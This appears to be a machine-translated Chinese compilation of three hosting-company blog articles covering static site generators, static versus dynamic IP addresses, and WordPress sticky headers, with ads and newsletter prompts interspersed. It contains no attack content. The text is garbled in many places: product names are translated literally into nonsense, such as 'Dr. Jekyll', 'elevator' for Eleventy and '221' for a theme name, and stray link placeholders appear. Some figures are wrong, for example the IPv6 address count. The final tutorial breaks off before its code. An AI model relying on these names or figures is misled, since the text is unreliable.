在我们讨论具体的静态站点生成器之前,值得一提的是,所有这些工具都是自托管的。要使用它们,你需要找到一个主机提供商,他们可以为你设置它们或者给你命令行的访问权限。
考虑到这一点,让我们回顾一下 2022 年静态站点生成器的一些最佳选择。
1.吉基尔博士
杰基尔主页。
Jekyll 是最受欢迎的开源静态网站生成器之一——理由很充分。它是驱动 GitHub Pages 的软件,为静态网站提供免费托管。
本质上,Jekyll 是一个博客友好生成器。这个静态软件支持 Markdown,附带一个全面的分类系统,并支持液体模板语言。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
使用 Jekyll 的一些最受欢迎的网站包括 Ruby on Rails 、 Sketch 和面向开发者的 Spotify】。
如果你想推出一个免费的静态网站,Jekyll 和 Github 页面可能是你的绝佳组合。
2.雨果
雨果主页。
Hugo 是一个开源的静态网站生成器,自称是一个“通用”框架。这是一种优雅的说法,你可以用 Hugo 来建立广泛的网站,远远超出简单的博客和宣传册页面。
使用 Hugo,您可以以极快的速度生成页面,构建时间通常不到一秒。该软件使你能够在使用 LiveReload 时预览对页面的修改,并且它提供了强大的主题功能。
Hugo 使用模块化系统来帮助你建立静态网站。您有几个模块可供选择,包括内容、布局和数据。
一些使用 Hugo 的流行网站包括:Password 的文档页面、T2、Linode 的文档部分和 KeyCDN。
使用 Hugo,您可以在任何页面上组合多个模块,以获得您需要的确切功能。
3.网格体
grid some 静态站点生成器。
Gridsome 是一个强大的静态站点生成器。你可以用它来用现代工具创建页面,比如 Vue.js 和 GraphQL 。
您还可以使用 Gridsome 为 CMS 设置“head”。例如,您可以使用 Gridsome 生成静态页面,这些页面使用从 WordPress 中提取的数据,这是一个“无头”CMS 设置。
无头设置的优点是,您可以获得使用静态页面的所有优点,同时还可以利用 CMS 的全部功能。换句话说,你可以用访问数据库,高级分类法,甚至是成熟的文本编辑器。
同样值得注意的是,Gridsome 提供了大量插件,您可以使用这些插件来扩展生成器的功能。如果有一个特性是框架没有提供的,那么很可能有一个插件可以实现它。
需要为你的 WordPress 站点提供超快的、可靠的、完全安全的托管服务吗?Kinsta 提供所有这些以及 WordPress 专家提供的 24/7 世界级支持。查看我们的计划
Gridsome 还是一个比较新的静态网站生成器。然而,已经使用这种软件的网站有两个很好的例子:智能城市博览会和 T2 格式。
正如你可能想象的那样,Gridsome 不像列表中的其他工具那样对初学者友好。你需要一些网络开发经验来充分利用这个软件。
如果你已经熟悉 Vue.js,Gridsome 是你可以使用的最好的静态站点生成器之一。
4.电梯,电梯
第十一个静止的地点发生器。
相对而言,Eleventy 是静态网站生成器领域的新手。这个特殊的软件依赖于 JavaScript 和 Node.js 。这意味着您需要对 JavaScript 语言有一定程度的了解才能有效地使用它。
如果你习惯使用 JavaScript,Eleventy 会奖励你一些静态站点生成器中最好的性能。
这个工具支持多种模板语言,但在其核心,Eleventy 依赖于 Liquid,这使它在这方面类似于 Jekyll。除了 Liquid,Eleventy 还可以为静态页面解析其他几种语言,包括 Markdown 和 JavaScript。
此外,随着像 Chrome 开发者 T1 和 T2 Netlify T3 这样的网站使用 Eleventy,它变得越来越受欢迎。
根据我们的经验,开始使用 Eleventy 可能有点困难,因为它的文档仍在编写中。然而,如果您正在寻找一个精益的静态站点生成器,这种努力是非常值得的。
5.鹈鹕
鹈鹕静止地点发电机。
Pelican 是一个鲜为人知的静态网站生成器,是关于 Python 的。如果您熟悉 Python,您可以使用该软件通过 Markdown 和 reStructuredText 创建静态页面。
这个软件附带了一套你可以定制的主题,它包含了多语言支持。此外,Pelican 使您能够从 WordPress 、RSS 提要和其他几个第三方来源导入数据,这使得它成为一个无头设置的绝佳选择。
Pelican 提供了一组健壮的插件,您可以设置这些插件来扩展生成器的功能。总的来说,它是我们列表中最精简的静态站点生成器之一,但是如果你已经知道或者想要学习 Python ,它是一个极好的选择。
T3】
选择静态站点生成器时需要考虑什么
静态站点生成器的选择主要取决于三个因素。让我们来分解一下它们是什么:
- 生成器使用哪种语言:一些静态站点生成器严重依赖 JavaScript 和其他库。根据您使用的生成器,您可能需要熟悉它的编程语言。
- 易用性:如果你是一名经验丰富的 web 开发人员,你应该能够相对容易地使用任何静态站点生成器。然而,如果你正在做你的第一个项目,你会想要选择一个初学者友好的发电机。
- 它支持的内容类型:大多数流行的静态站点生成器将使你能够创建各种类型的页面。然而,其他人则专注于特定类型的内容,如博客文章。
- 现有的软件社区:总的来说,我们建议您使用拥有成熟用户社区的工具。这样,您可以更轻松地解决问题并获得问题的答案。
我们在这里看到的大多数静态站点生成器都要求您至少对 web 开发基础有所了解。如果这听起来太多了,你最好使用像 WordPress 这样的用户友好的 CMS。
一个受管理的 WordPress 网站可以和一个静态网站一样快。此外,CMS 易于使用(即使您正在进行第一个项目)。
摘要
很多人认为静态网站是旧互联网的残余。然而,静态页面对任何网站都有好处,因为它们通常比动态页面表现更好。根据你选择的生成器,你甚至可以建立一个具有静态页面输出的无头 WordPress 网站。
如果你正在考虑使用静态站点生成器,以下是我们的五大建议:
- Jekyll : 一个博客友好的静态站点生成器,可以用于 Github 页面。
- 雨果 : 一种基于模块的静止现场发生器,具有极快的性能。
- Gridsome : 这个可伸缩的生成器使用 Vue.js 来帮助你创建静态页面。
- 十一 : 如果你是 JavaScript 和 Node.js 的粉丝,这个生成器是完美的。
- Pelican : 一个精简的基于 Python 的静态站点生成器。
你是否在考虑为你的下一个 web 项目尝试一个静态站点生成器?请在下面的评论区告诉我们吧!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
静态与动态 IP 地址:您需要知道的一切
每台连接到互联网的计算机都有一个互联网协议(IP)地址。然而,并非所有 IP 地址的外观或行为都相同。
如果您正在使用计算机网络或服务器,了解动态和静态 IP 之间的区别是至关重要的。通过了解每种协议,您可以选择最适合您需求的解决方案。
在本文中,我们将讨论静态和动态 IPs 之间的区别。我们还会帮你算出你的 IP 地址,并解释如何给它分配一个固定的号码(如果你愿意的话)。
我们开始工作吧!
静态 IP 和动态 IP 地址简介
正如我们之前提到的,每个支持互联网的设备都有一个 IP 地址。它可以是唯一的数字或字母数字字符串,具体取决于您使用的协议。大多数设备使用 IPv4 地址,看起来像这样:151.164.152.92。
虽然 IP 地址起初看起来可能是随机的,但它们包含了许多关于您当前网络的信息。以下是上例中每个分段所代表的含义:
- 151.164 . xx . xx—IP 地址的前半部分标识您的网络。根据您所在的位置,它可以指互联网提供商,甚至更广泛的一组设备。
- xx . xx . 152.92—IP 地址的后半部分标识您的主机和网络中的每台机器。并非本地网络中的所有设备都共享同一个 IP 地址。
请记住,这只是 IP 地址的一个例子。当我们谈论“静态”地址时,我们指的是一系列识别您的设备并且永远不会改变的数字。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
如果您有一个动态 IP 地址,数字标识符将定期更改。通常,这种调整是由您的互联网服务提供商(ISP)做出的,通常您甚至不会意识到这一点(因为这通常不会影响浏览体验)。
确定你的知识产权是什么
查找您的 IP 地址的工作方式因您使用的操作系统(OS)而异。让我们回顾一下 Windows 和 macOS 设备的流程。
如何在 Windows 中找到您的 IP 地址
在 Windows 中找到您的 IP 地址的最简单的方法是打开开始菜单,键入“cmd”并启动命令提示符。一旦命令提示符打开,键入“ipconfig /all”并按下 Enter 键。
命令提示符将返回所有网络适配器的信息,因此您需要确定您使用的是哪一个:
使用 Windows 命令提示符查找您的 IP 地址。
需要整理的信息很多,但目前只有两个要素很重要:
- IPv4 地址:这是您的 IP 地址,在本例中,我们使用的是 IPv4 协议。
- DHCP Enabled: 如果动态主机配置协议(DHCP) 被启用,则意味着没有静态 IP 地址。
我们稍后将讨论动态和静态 IPs 的优缺点。现在,让我们来看看如果你使用 macOS,如何找到你的 IP 地址。
如何在 macOS 中找到您的 IP 地址
如果您正在使用 macOS,找到您的 IP 地址的最快方法是打开网络偏好设置菜单并选择您正在使用的网络。点击相关的高级按钮,然后选择 TCP/IP 选项卡:
在 macOS 上查找自己的 IP 地址。
您的 IP 地址将显示在 IPv4 地址或 IPv6 地址旁边,这取决于您的网络使用的协议。我们将在后面的章节中讨论这些协议之间的区别。现在,检查使用 DHCP 的选项是否在任一部分下启用。
如果启用了 DHCP,您将拥有一个动态 IP 地址。您已经知道了动态和静态 IP 地址之间的区别,但是现在是时候讨论您应该使用哪个选项了。
静态与动态 IP 地址(4 个关键考虑因素)
使用静态或动态 IP 地址各有利弊。在接下来的几节中,我们将分解选择这些类型时要记住的四个重要因素。
1.何时应该使用静态 IP 地址
最常被分配静态 IP 的两种设备是服务器和外围设备。如果你正在使用你的设备浏览网页,那么从技术上来说,你的 IP 地址是否一直在改变并不重要。
但是,静态 IP 地址在某些情况下是必需的,包括:
- 使用允许的 IP 地址连接到虚拟专用网络(VPN)
- 使用允许的 IP 地址访问网站管理部分
- 远程访问您的设备
许多网络主机和电子邮件提供商提供静态 IP 地址,作为特定计划的额外服务。然而,你不一定需要一个静态的 IP 地址来运行一个网站。
如果你远程工作,你需要连接到 VPN 来访问工作文件,你的雇主可能会要求你设置一个静态 IP 地址。允许现有 IP 地址使雇主和其他网络管理员能够决定谁有权访问系统,这对安全目的至关重要。
在这两种情况下拥有一个静态 IP 地址也意味着你是唯一使用它的人。使用共享的 IP 地址,如果其他用户发送垃圾邮件或建立被认为不安全的网站,您可能会受到惩罚。
然而,在实践中,任何有信誉的网络主机或电子邮件提供商都会确保你不会遇到任何问题,即使你使用的是共享的 IP 地址。例如,在 Kinsta,我们使用 Cloudflare 提供的一系列共享 IP 地址,您的网站不会因此受到任何负面影响。
2.何时应该使用动态 IP 地址
在大多数情况下,你的 IP 地址是否定期更改并不重要。如果您不需要经常访问专用网络,或者没有人需要远程访问您的设备,您可以不使用静态 IP 地址。
需要注意的是,IP 地址的数量是有限的,即使它们是动态变化的,一些 IP 地址最终还是会重复或被共享。过去,共享 IP 地址给网站和个人使用带来了严重的问题。然而,如今没有静态 IP 地址的几乎没有缺点。
3.家庭网络的静态与动态 IP 地址:使用哪一个
在大多数情况下,您的互联网提供商将决定您使用动态还是静态 IP 地址。但是,即使您的提供商默认提供动态 IP 地址,也总有办法设置静态 IP 地址。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
如果您需要连接到 VPN 或具有允许的 IP 地址列表的网站,您将需要一个静态 IP。然而,如果您只需要远程访问您的家庭网络设备,大多数现代工具使您能够连接到它们而无需输入 IP 地址。
例如,谷歌 Chrome 远程桌面会要求您输入唯一的访问代码,而不是 IP 地址:
使用谷歌 Chrome 远程支持连接到远程设备。
这种工具的可用性意味着您的家庭网络很少需要静态 IP 地址,而不是动态 IP 地址。
4.动态 IP 与静态 IP:安全考虑
如果有人知道您的服务器或个人设备的 IP 地址,他们可以尝试连接到它。即使您的家庭设备或服务器不包含任何宝贵的信息,恶意行为者也可能会试图闯入。如果你有一个静态的 IP 地址,这意味着那些黑客总是知道在哪里找到你。
动态 IP 地址是现成的更安全的选择。然而,需要注意的是,即使攻击者知道在哪里可以找到你,也不一定意味着他们会进入。有了适当的安全措施,静态 IP 地址和动态 IP 地址一样安全。
IPv4 和 IPv6 地址的区别
到目前为止,我们只关注了 IPv4 地址。然而,这不是唯一可用的协议。IPv6 是另一种选择,它在某个时候可能会成为 IP 地址的标准。
这些协议之间有几个不同之处。世界慢慢过渡到 IPv6 的主要原因是,由于 IPv4 的配置方式,它只能支持大约 40 亿个 IP 地址。
由于人们拥有多台支持互联网的设备变得越来越普遍,即使有 DHCP 的帮助,40 亿个 IP 地址也是不够的。IPv6 协议通过使用字母数字地址解决了这个问题,这与 IPv4 的纯数字方法形成对比。
以下是 IPv6 地址的一个示例:
2001 年:0db 8:0000:0000:0000:ff00:0042:7879
增加的长度以及字母和数字的混合意味着 IPv6 地址可以支持 340 万亿个地址。这么大的数量,我们不应该用很长时间。
目前,全球只有大约 35% 的设备在使用 IPv6 地址。像 IPv4 一样,IPv6 协议支持静态和动态地址。这意味着我们到目前为止讨论的所有考虑因素也适用于这个新协议。
如何获得静态 IP 地址
如果你需要一个静态 IP 地址,有几种方法可以得到,这取决于你的情况。在本节中,我们将讨论所有这些问题,无论您是想为 web 服务器还是本地网络设备(有线或无线)设置或更改静态 IP。
需要一个给你带来竞争优势的托管解决方案吗?Kinsta 为您提供了令人难以置信的速度、一流的安全性和自动伸缩功能。查看我们的计划
如何为 Web 或电子邮件服务器设置静态 IP
如果你想为一个不是你自己托管的网站或电子邮件服务器设置一个静态(非共享)IP,你需要向你的提供商申请一个。在许多情况下,如果你使用 VPS 或云托管计划,虚拟主机或电子邮件提供商会额外提供静态 IP。
请记住,为专用服务器付费并不一定意味着你会得到一个静态 IP。动态 IP 是大多数情况下的标准,所以即使你注册了专门的计划,你可能仍然需要支付额外的费用。
如何为本地设备分配静态 IP 地址
如果你有一个动态的 IP 地址,而想要一个静态的,许多人建议联系你的互联网提供商。然而,根据我们的经验,大多数互联网提供商不能为住宅用户分配静态 IP 地址。
您最好的选择是通过您的操作系统或路由器(如果包括您的话)自己配置一个静态 IP。如果您需要一个静态 IP 来连接到另一个具有允许列表地址的网络,您也可以使用提供固定地址的 VPN。
如何为 Windows 设备分配静态 IP
您可能还记得,IPv4 地址包括网络和主机标识符。在大多数情况下,您可以将设备配置为使用静态 IP,而不必担心与其他地址冲突。
如果你使用的是 Windows,你可以通过访问操作系统设置下的网络&互联网部分,然后选择更改适配器选项来完成:
在 Windows 中更改您的网络适配器选项。
您将看到所有可用网络连接的概览。右键单击您的活动网络连接并选择属性。接下来,在弹出的窗口中点击互联网协议版本 4 (TCP/IPv4) 选项,然后点击属性按钮:
在 Windows 中访问您的 IPv4 设置。
将会打开一个新窗口,允许您选择使用以下 IP 地址设置。单击该选项,然后设置您想要使用的静态 IP 地址:
在 Windows 中设置静态 IP。
请记住,您不能只输入您想要的任何值。以下是填写每个字段的一些指导,这样您就不会遇到任何错误:
- IP 地址:你设置的静态 IP 要复制你当前地址的前三段。如果你现在的地址是“XXX”。XXX.XXX.XXX”,新的应该是“XXX。XXX.XXX.YYY”。这是因为这些第一段标识了您的网络和主机。
- 子网掩码:如果您使用的是住宅网络,您的子网掩码应该是“255.255.255.0”,这意味着您的网络使用 24 位作为其标识符。
- 默认网关:这应该是您路由器的 IP 地址,您可以通过打开命令提示符并键入“ipconfig /all”来找到它
填写完每个字段后,点击确定。如果您的设置是正确的,您将有一个新的静态 IP。
如何将静态 IP 分配给 macOS 设备
在 macOS 设备上分配静态 IP 地址的方式非常相似。您还必须输入一个 IP 地址、一个子网掩码和您的默认网关(您可以在前一节中读到)。
唯一的区别是到达这些设置需要不同的路线。以下是在 macOS 中访问活动网络的配置 IPv4 菜单的三个步骤:
- 打开苹果菜单,点击系统偏好,然后选择网络选项。
- 点击左侧面板中的以太网。
- 在配置 IPv4 菜单设置下选择手动选项。
完成这些步骤后,您需要填写以下字段,包括新的静态 IP 地址、子网掩码和默认网关:
在 macOS 上设置静态 IP 地址。
保存对网络配置的更改,您就可以开始工作了。现在,只要您不将更改恢复到您的网络,您的 IP 地址将保持静态。
摘要
大多数互联网和虚拟主机提供商会给你分配动态 IP 地址。通常,这不是一件坏事。但是,在某些情况下,静态 IP 是必要的,例如,如果您需要使用允许列表中的地址访问工作 VPN。
然而,如果你在运营一个网站,你可能不需要一个静态 IP。在 Kinsta,我们向所有客户提供由 Cloudflare 提供的共享 IP 地址。即使没有专用 IP,我们的大多数客户也能看到他们网站性能的显著提高。
关于静态和动态 IP 地址,您有什么问题吗?请在下面的评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何用 WordPress 为你的网站创建完美的粘性标题
导航是一个设计优秀的 WordPress 网站的重要方面。因此,有必要花些时间来思考一下访问者是如何通过你的导航与你的页面进行交互的。一种方法是使用粘性头。
这是当用户滚动时,你的站点的标题部分保持在屏幕顶部的地方。这提供了无数的好处,但是一个主要的优点是你的导航元素保持在用户的视野之内,不管它们在页面上的什么位置。仅仅因为这个原因,粘性头是一个受欢迎的用户界面(UI)元素。
在本教程中,我们将向你展示如何在 WordPress 中创建一个粘性标题。它将涵盖很多方面,比如网络上的例子,可以帮助你的 WordPress 插件,以及如何开发你自己的粘性标题的指南。不过,首先让我们更详细地讨论一下什么是粘性头。
多粘的头球啊
A header section of Kotaku’s website.
你网站的页眉部分有点像你网站的信息咨询台。这将是大多数用户最先发现的东西,他们将总是在某个地方检查以找出一些关键信息,并执行某些操作:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
- 例如,你的徽标或网站名称会出现在这里,作为你的用户的一个接地点。在大多数情况下,他们可以通过点击图标回到主页。
- 如果你在你的网站上运行用户账户,标题通常会提供一个链接来登录这些账户和个人资料页面。
- 这里可能有搜索功能,特别是如果你有一个在不同区域有大量内容的大型网站。
- 当然,你的站点的导航也是页眉不可或缺的一部分。
总的来说,你的页眉是用户的一个接触点。你会发现它通常是 F 型阅读模式的“标杆”,所以它能在直觉层面上吸引用户的注意力。
你可能已经知道什么是粘性头,即使是直觉上的。当你滚动的时候,你的网站的标题部分会“粘”在屏幕的顶部。与静态标题不同,静态标题保持不变,当你滚动时就会消失,而粘性标题是一个始终可见的元素。
虽然粘滞标题的典型方法是将其静态版本粘在屏幕顶部,但有几种不同的方法可以使其更有用、更节省屏幕空间和更动态。接下来,我们将看一些真实世界的例子。
网上粘性标题的例子
你会发现网上到处都是粘性标题,看看你能实现的范围是个好主意。一个最基本的例子来自于锤头。这个网站使用了一个“弹出菜单”和一个粘性标题,而且很简单:它致力于在静态布局中坚持在页面的顶部:
The sticky header on the Hammerhead site.
另一个简单的实现来自 Kin 。这使用了一个典型的粘性标题,但是这次加入了一些很酷的设计元素。
您会注意到,对比度会根据您滚动浏览的网站部分而变化,而且还有一些不错的过渡效果:
The sticky header on the Kin website.
我们不能不提到 Kinsta sticky header 就结束这一节。这也保持了标题元素的简单性,但也包含了简洁的易用性,为访问者提供了价值:
The sticky header on the Kinsta website.
这一次,当您向下滚动页面时,您将看到页眉消失。但是,当您向上滚动时,它会重新出现,您可以将其称为“部分持久标题”
这里的前提是向下滚动意味着你把时间投入到页面本身,所以可能不需要导航,登录页面,或前往其他地方。然而,当你向上滚动的时候,你更有可能想去网站的另一个页面。在这里,粘性标题将出现,以挽救这一天。
正是这些小小的用户体验(UX)造就了一个访问者想要再次访问的网站。对于你自己的粘性标题设计,你会想考虑你能做些什么来制作一个关注访问者需求的 UX 和用户界面。
为什么你应该为你的网站使用粘性标题
许多网站使用粘性标题,这是有充分理由的。它们是你整个网站体验的关键部分,对你的 UX 和用户界面有很大的影响。
假设你要在标题中包含的元素是用户一直想要访问的,那么让它们一直显示出来是有意义的。对于小屏幕设备和格式来说尤其如此。
虽然在视口空间非常宝贵的情况下,拥有一个“永远打开”的标题似乎有悖常理,但这只是一个小小的牺牲。真正的好处是减少了移动用户滚动屏幕的理由——这在较小的设备上是必要的。如果你能在不需要滚动的情况下提供你的站点导航,用户就能更容易地在你的站点上移动。
粘性标题的利弊
我们讨论了粘性标题的一些优点,所以让我们快速总结一下:
- 您可以提供用户可以随时访问的导航,这有助于在您的网站上保持自然的阅读模式。
- 你可以根据不同的需求调整标题,比如对比度、配色方案,甚至用户意图。
- 桌面和小屏幕都有机会为用户提供价值。
然而,粘性报头并不是增加 UX 的灵丹妙药,使用它们有一些缺点:
- 我们简要地介绍了这一点,但是对于各种尺寸的屏幕,你需要为你的标题分配空间。
- 一个粘性的标题会自然地从你的其他内容中带走,因为它本身的元素会把注意力从页面主体上引开。
- 一个好的粘性标题需要更多的开发工作,因为你需要实现它,确保它能在不同的浏览器中工作,并在较小的屏幕上检查它的错误。
但是,如果您考虑您的设计选择、用户需求和站点目标,您可以减轻或消除所有这些缺点,同时保留优点。一种方法是通过 WordPress 插件。
3 个插件帮助你创建粘性标题
在接下来的几节中,我们将展示一些领先的 WordPress 粘性标题插件。稍后,我们将讨论这种类型的解决方案是否适合您。不管怎样,一个插件可以帮助你实现功能而不需要代码,如果你的主题不包含它,这是很有价值的。
更重要的是,您可以通过插件利用专家的设计和开发经验。开发人员将为您做出一些更重要的技术选择,并将其包装在一个直观易用的 UI 中。
1.粘性菜单和粘性标题
Webfactory 的粘性菜单&粘性标题插件是一个很好的首选,因为它有丰富的功能、有用的灵活性和预算友好的价格。
The Sticky Menu & Sticky Header plugin.
这里的吸引力在于你可以让你的站点上的任何元素粘在屏幕上。这可能在很多方面有所帮助,但这意味着实现粘性头是轻而易举的事。
该插件还提供了一系列强大的选项来帮助您实现粘性标题:
- 你可以设定你想要的“顶级”定位。这意味着您可以在页眉上方的区域添加空间,以满足您的设计目标。
- 还有其他的定位选项,比如使用 z-index CSS 属性来设计你的站点的“从前到后”
- 您可以仅在您选择的页面上启用粘性标题,如果您有登录页面或其他不合适的内容,这可能会很有用。
粘性菜单和粘性标题还包括一个调试模式,以帮助您修复任何“非粘性”元素。动态模式也有助于解决响应式设计的问题。
最好的消息是粘性菜单&粘性标题是免费下载和使用的。更重要的是,有一个高级版本可以带走你需要的更多技术知识。
对于插件的免费版本,您需要知道元素的选择器,以便在选项中指定它。然而,高级版本(每年 49-199 美元)提供了一个视觉元素选择器来绕过这一点。
2.221 的选项
虽然我们不会为大多数以客户为中心的网站推荐一个 WordPress 默认主题,但是对于博客和类似类型的网站来说,它们已经足够了。
在我们看来,Twenty Twenty One 是一个出色的默认主题,但缺乏粘性标题功能。如果你想增加这个功能,221 个插件的选项可以实现你所需要的。
The Options for Twenty Twenty-One plugin.
这个版本的插件是众多插件中的一个。每个最近的默认主题都有一个版本,但还没有一个版本适合 222 个 T1。不管怎样,插件的核心功能提供了许多额外的功能:
- 有一个全网站编辑(FSE) 工具,准备全面推出。
- 您可以更改正文的字体大小,删除超链接下划线,以及其他简单的自定义设置。
- 您可以处理最大宽度的容器和元素,而无需编写代码。
对于导航、内容、页脚和页眉,还有很多其他选项。对于后者,你可以隐藏它,使它全幅显示,添加一个背景图片和颜色,以及许多其他的改变。
虽然核心插件是免费的,但你需要一个高级升级(25-50 美元)来访问粘性标题选项。这允许你从 WordPress 定制器中调整移动和桌面标题的设置:
The WordPress Customizer, showing sticky header options.
鉴于这个名字,你不应该期望这个插件能与任何其他主题一起工作,除了 221(或者任何你选择的‘风格’)。)然而,如果你确实使用了这个默认主题,并且不想编码,它将非常理想地帮助你在你的站点上添加一个粘性标题。
3.浮动的通知栏,滚动的粘性菜单,任何主题的粘性标题
这是一个插件,它把自己的卡片放在桌子上。Premio 的 myStickymenu 插件提供了几乎所有你想要包含在你自己的粘性头中的东西,并且打包了大量的功能。
The myStickymenu plugin.
它在 WordPress 插件目录上的正面评价数量惊人——799 个五星评价,平均 4.9 分。部分原因在于您可以随意使用的综合功能集:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
- 它提供了使用灵活性。例如,您可以创建一个欢迎栏以及粘性菜单和标题。
- 插件适应你的站点的响应速度。这意味着您不需要使用代码来实现更多的功能。
- 事实上,插件不需要你知道如何编码来充分利用它。
- myStickymenu 插件与许多领先的页面生成器插件兼容,如 Elementor 、 Beaver Builder 、原生块编辑器、 Divi Builder 等等。
你也有许多定制选项来让你的粘性标题按照你喜欢的方式工作。例如,您可以选择制作部分持久化的页眉,更改简单的方面,如背景颜色、版式选择等等。
此外,由于你可以用不同的方式展示你的粘性标题(比如菜单和欢迎栏选项),你可以选择它们在你的站点上的显示方式和位置。
尽管 myStickymenu 的免费版本可能足以满足您的需求,但也有一个高级版本(每年 25-99 美元。)这提供了更多的方法来禁用特定条件下的粘性标题,倒计时定时器,添加多个欢迎栏的能力,以及更多的定制选项。
如何在 WordPress 中创建粘性标题
在本教程的剩余部分,我们将向你展示如何在 WordPress 中创建一个粘性标题。这里有几种方法可供您选择,我们将同时介绍这两种方法。然而,我们的第一步将帮助您做出决定。
从那里开始,你将使用你喜欢的方法制作你自己的粘性标题,然后应用我们的一些技巧,使你的标题在将来更加有效和有用。
1.决定如何创建你的粘性标题
WordPress 对各种用户如此灵活的一个原因是它的插件生态系统和开源扩展性。因此,你可以选择现成的解决方案,也可以“自己动手”
你的第一个任务是决定是使用插件还是深入代码来实现你的粘性头。让我们来分解这两种解决方案:
- 外挂。这将是一个 WordPress 认可的方法,尤其是如果你手头没有技术知识的话。它将提供灵活性,但是您将受到开发人员认为重要的东西以及他们编码能力的支配。
- 编码。如果你心中有一个清晰的愿景,你可能想为你的网站编写一个粘性的标题。当然,你需要的专业技术来完成这件事(主要是 CSS ),但是结果将会是你想要的。然而,您将有更多潜在的维护要执行,它的成功将取决于您自己的编码能力。
我们会说,对于大多数 WordPress 用户来说,插件将是创建粘性标题的理想解决方案。它将很好地与平台兼容,如果您遇到问题,也更容易进行故障诊断。然而,在未来的步骤中,我们将涵盖编码解决方案以及插件选项。
2.选择是修改当前主题还是选择一个专用主题
你要考虑的下一个方面是你是否要修改你当前的主题,或者选择一个已经有粘性标题功能的主题。如果你的主题没有处理粘性标题的功能,这将是很重要的。
许多主题和页面生成器插件将包含一个粘性标题选项,这是因为它的好处和为你提供设计灵活性。你会发现一些更大的通用主题和插件提供了这种标准,比如 Elementor 、 Astra 、Divi、Avada 和无数其他的。
The sticky header option within Elementor.
要做出这个决定,你需要考虑一些关于你当前主题和站点的事情:
- 你的网站看起来已经是你想要的样子了,还是需要更新?
- 你当前的主题在引擎盖下容易定制吗?开发者文档应该会告诉你这些。
- 你想要一个复杂的首选粘性头实现还是一个更简单的?
根据你在这里给出的答案,你会选择其中之一。如果你需要一个新的主题,你也可以选择一个提供粘性头实现的主题。然而,如果你想继续使用你当前的主题,并且它还没有粘性标题功能,你可以卷起袖子,按照下面的一个子步骤来做。
2a。使用带有特定主题的插件
如果你没有开发经验,我们建议你选择一个插件来为你的网站添加粘性标题功能。有太多的变量需要你去考虑、构建和维护。相比之下,一个插件已经有了一个代码库来支持这些元素,所以它将为大多数情况提供一个几乎理想的选择。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
对于教程的这一部分,我们将使用 myStickymenu 插件,因为它为大多数用例提供了一个全面而丰富的特性集。然而,你将使用的大多数插件的一般用法是相同的。
一旦你安装并激活你的插件,你将需要前往主题选项所在的地方。对于一些插件,这将在 WordPress 定制器中;对于其他人,一个专门的管理面板。在这里,你将在 WordPress 的 myStickymenu >仪表盘中使用一个定制管理面板:
The myStickymenu admin panel within WordPress.
然而,默认屏幕显示的是欢迎栏的设置,对于本教程来说,这不是我们想要的。因此,点击切换按钮关闭工具条,并点击进入粘性菜单设置屏幕:
The Sticky menu settings screen.
虽然这里有很多选项,但你只需要 Sticky Class 面板。将粘性标题切换到“开”后,在与其他类别或 ID 下拉菜单一致的相关字段中输入标题的相关 HTML 标签:
Changing the HTML selector tag within the myStickymenu plugin.
保存更改后,这将应用于您的网站。从这里,您可以研究一些样式功能。例如,您可以设置淡入淡出或幻灯片过渡效果,设置 z-index ,处理不透明度、颜色和过渡时间,以及一系列其他选项。
2b。编写代码来创建你的粘性头
不言而喻,这个部分是为有开发经验的人准备的。稍后您将会看到,代码本身是如此简单,令人难以置信。然而,考虑到额外的工作,维护和一般保养来创建一个自定义的粘性标题,你也需要利用你的经验的其他方面。
但是,在开始之前,您需要以下内容:
- 一个像样的代码编辑器,虽然在这种情况下(取决于实现),您可以使用默认的操作系统(OS)文本编辑器。
- 你需要访问你网站的文件,你应该备份这些文件,然后下载到本地 WordPress 开发环境。
值得一提的是,你不想在你的网站文件上工作。相反,在一个临时环境或本地设置中工作,然后在测试完成后将文件上传回你的服务器。
你还需要使用一个子主题,因为你正在对你的父主题进行定制修改。这有助于你组织你的代码,并确保如果主题得到更新,任何改变(字面上)都不会改变。
使用代码实现粘性头:找到正确的头标记
记住所有这些,你可以开始了。第一项工作是为你的导航找到正确的 HTML 标签。这里的结果将取决于您使用的主题,尽管在大多数情况下, header 标签是一个安全的选择。最好的方法是使用你的浏览器的开发工具并选择标题:
The Inspect Element tool showing the Kinsta site and the tag.
你可能会发现这并不像一个标签那么简单,所以我们建议你看一下你的主题文档(或者直接和开发者交流),以便找到你需要的标签。
使用代码实现粘性头:使用样式表
接下来,您应该在您的子主题目录中创建或打开一个 style.css 文件。这将把您的 CSS 附加到核心安装的 CSS 上,在标签重复的地方,覆盖它。
在这个文件中,添加你需要注册的典型元数据子主题:
Creating a child theme using Onivim2.
接下来,您需要添加代码来启用您的粘性头。这需要一些 CSS 继承的知识,根据你使用的主题,这可能是一个令人愤怒的经历。
